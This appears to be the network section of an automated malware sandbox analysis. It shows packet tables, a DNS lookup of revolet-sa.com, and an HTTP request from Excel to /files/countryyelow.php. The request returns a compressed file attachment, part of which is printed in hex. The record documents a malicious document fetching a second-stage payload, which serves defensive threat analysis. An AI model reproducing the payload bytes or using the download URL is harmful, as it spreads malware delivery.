                                                                                                                                                      Apr 6, 2021 21:09:10.617773056 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617800951 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617821932 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.617845058 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617886066 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617894888 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.617923975 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617961884 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.617985964 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618000984 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618000984 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618038893 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618067026 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618093967 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618103027 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618143082 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618144035 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618184090 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618191957 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618222952 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618256092 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618262053 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618299007 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618316889 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618324041 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618360996 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618391991 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618397951 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618439913 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618455887 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618478060 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618511915 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618515968 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618593931 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618599892 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618633986 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618663073 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618722916 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618742943 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618783951 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618820906 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618859053 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618864059 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618896961 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618916035 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.618938923 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618968010 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.618978024 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.619004011 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619040966 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619070053 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.619079113 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619110107 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.619117022 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619155884 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619170904 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.619196892 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.619256020 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.619322062 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.797693968 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797724009 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797759056 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797785044 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.797789097 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797816038 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797842026 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797868967 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797890902 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.797894955 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797923088 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797950029 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.797970057 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.797986984 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798017025 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798038006 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.798042059 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798069000 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798089027 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.798094034 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798120022 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.798141003 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.798218012 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.803292990 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803320885 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803355932 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803381920 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803385019 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.803462029 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.803816080 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803843021 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803869963 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803889990 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.803898096 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803930998 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803961039 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803986073 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.803996086 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804013014 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804040909 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804066896 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804075003 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804095030 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804122925 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804141045 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804156065 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804184914 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804202080 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804214001 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804240942 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804267883 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804292917 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804317951 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804341078 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804343939 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804380894 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804405928 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804409981 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804435968 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804467916 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804495096 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804521084 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804527998 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804548025 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804573059 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804596901 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804601908 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804624081 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804651022 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804662943 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:10.804680109 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.804743052 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:15.627772093 CEST8049712192.232.249.186192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:15.627970934 CEST4971280192.168.2.3192.232.249.186
                                                                                                                                                      Apr 6, 2021 21:09:45.657560110 CEST8049712192.232.249.186192.168.2.3

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 6, 2021 21:08:53.182508945 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:08:53.230185032 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:08:54.015490055 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:08:54.061420918 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:08:54.936539888 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:08:54.986403942 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:08:55.850074053 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:08:55.904093981 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:08:57.280009985 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:08:57.326020002 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:03.525989056 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:03.581567049 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:04.617412090 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:04.682025909 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:05.083122015 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:05.155122042 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:06.077193022 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:06.149241924 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:07.093025923 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:07.162396908 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:07.596960068 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:07.642924070 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:09.119846106 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:09.177314997 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:09.189029932 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:09.246563911 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:09.678334951 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:09.727859974 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:10.736625910 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:10.785418987 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:11.662204981 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:11.716929913 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:12.564333916 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:12.612997055 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:13.124433994 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:13.196268082 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:13.497529030 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:13.543590069 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:14.607702017 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:14.653774023 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:17.511754036 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:17.560619116 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:18.390175104 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:18.435975075 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:19.242616892 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:19.297146082 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:20.570292950 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:20.627460003 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:26.021904945 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:26.082811117 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:30.538408041 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:30.593894958 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:38.646001101 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:38.706895113 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:47.701230049 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:47.755765915 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:09:51.027398109 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:09:51.091146946 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:10:00.813185930 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:10:00.859368086 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:10:04.093431950 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:10:04.149611950 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:10:36.575643063 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:10:36.621680975 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                      Apr 6, 2021 21:10:37.887641907 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                      Apr 6, 2021 21:10:37.954499960 CEST53612928.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Apr 6, 2021 21:09:09.189029932 CEST192.168.2.38.8.8.80x780fStandard query (0)revolet-sa.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Apr 6, 2021 21:09:09.246563911 CEST8.8.8.8192.168.2.30x780fNo error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • revolet-sa.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349712192.232.249.18680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 6, 2021 21:09:09.435091972 CEST1150OUTGET /files/countryyelow.php HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: revolet-sa.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Apr 6, 2021 21:09:09.868837118 CEST1153INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 06 Apr 2021 19:09:09 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Content-Disposition: attachment; filename="BDKsV.fbx"
                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                      Connection: Upgrade, Keep-Alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                      Keep-Alive: timeout=5, max=75
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                                                                                                                                                      Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y
                                                                                                                                                      Apr 6, 2021 21:09:09.868865013 CEST1154INData Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be
                                                                                                                                                      Data Ascii: Oj-;)>d``O7N~M0?M>F|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!|~!
                                                                                                                                                      Apr 6, 2021 21:09:09.868881941 CEST1156INData Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46
                                                                                                                                                      Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
